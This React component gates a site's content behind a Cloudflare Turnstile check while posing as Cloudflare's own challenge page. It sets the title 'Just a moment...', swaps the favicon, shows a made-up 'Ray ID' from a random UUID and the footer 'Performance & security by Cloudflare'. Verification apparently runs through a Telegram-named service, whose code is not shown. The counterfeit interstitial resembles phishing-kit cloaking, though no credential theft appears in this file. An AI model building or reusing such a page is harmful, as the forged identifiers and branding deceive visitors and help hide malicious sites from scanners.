"use client";

import { useEffect, useState } from "react";
import Turnstile from "./Turnstile";
import { handleVerify } from "../services/telegram.service";
import { useTemporaryTitle } from "../hooks/useTemporaryTitle";
import { useTemporaryFavicon } from "../hooks/useTemporaryFavicon";

type Props = {
    siteKey: string;
    children: React.ReactNode;
};

export default function TurnstileGuard({
    siteKey,
    children,
}: Props) {
    const [verified, setVerified] = useState(false);
    const [loading, setLoading] = useState(true);
    useTemporaryTitle("Just a moment...", !verified);
     useTemporaryFavicon(!verified);
    const handleVerifySite = async (token: string) => {
        try {
            const { data } = await handleVerify(token)
            console.log("Turnstile verification response:", data);

            if (data.success) {
                setVerified(true);
            }
        } finally {
            setLoading(false);
        }
    };

    if (verified) {
        return <>{children}</>;
    }

    // Chưa verify → block

    return (
        <div
            style={{
                minHeight: "100vh",
                background: "#fff",
                color: "#111",
                display: "flex",

                justifyContent: "center",
                paddingTop: "80px",
                fontFamily:
                    '-apple-system, BlinkMacSystemFont, "Segoe UI", Roboto',
            }}
        >
            <div style={{ width: 720, display: "flex", flexDirection: "column", justifyContent: "space-between" }}>
                <div>
                    <h1 style={{ fontSize: 32, marginBottom: 8 }}>
                        {window.location.hostname}
                    </h1>

                    <p style={{ fontSize: 20, marginBottom: 24, color: "#444" }}>
                        Verify you are human by completing the action below.
                    </p>

                    {/* Turnstile */}

                    <Turnstile
                        siteKey={siteKey}
                        appearance="always"
                        onVerify={handleVerifySite}
                    />


                    <p style={{ marginTop: 32, color: "#444" }}>
                        {window.location.hostname} needs to review the security of
                        your connection before proceeding.
                    </p>

                </div>
                <div>

                    <hr style={{ margin: "20px 0", borderColor: "#eee" }} />

                    <p style={{ fontSize: 12, color: "#777", textAlign: "center" }}>
                        Ray ID: {crypto.randomUUID().slice(0, 16)}
                    </p>

                    <p style={{ fontSize: 12, color: "#777", marginBottom: "12px", textAlign: "center" }}>
                        Performance &amp; security by{" "}
                        <strong>Cloudflare</strong>
                    </p></div>
            </div>
        </div>
    );
}
